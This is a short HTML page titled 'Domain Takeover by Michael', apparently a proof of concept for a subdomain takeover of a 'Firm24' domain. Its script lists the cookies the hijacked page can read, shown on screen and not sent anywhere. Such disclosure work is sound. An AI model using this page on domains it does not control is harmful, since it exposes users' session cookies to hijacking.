<html>
<title>Firm24 domain</title>
<head></head>
<body>
  <center>Domain Takeover by Michael</center><br />
  <p>readable cookies:</p>
  <span id=list>-</span>
  <script>
    function listCookies() {
        var theCookies = document.cookie.split(';');
        var aString = '';
        for (var i = 1 ; i <= theCookies.length; i++) {
            aString += i + ' ' + theCookies[i-1] + "\n";
        }
        return aString;
    }
    document.getElementById('list').textContent = listCookies();
  </script>
</body>
</html>
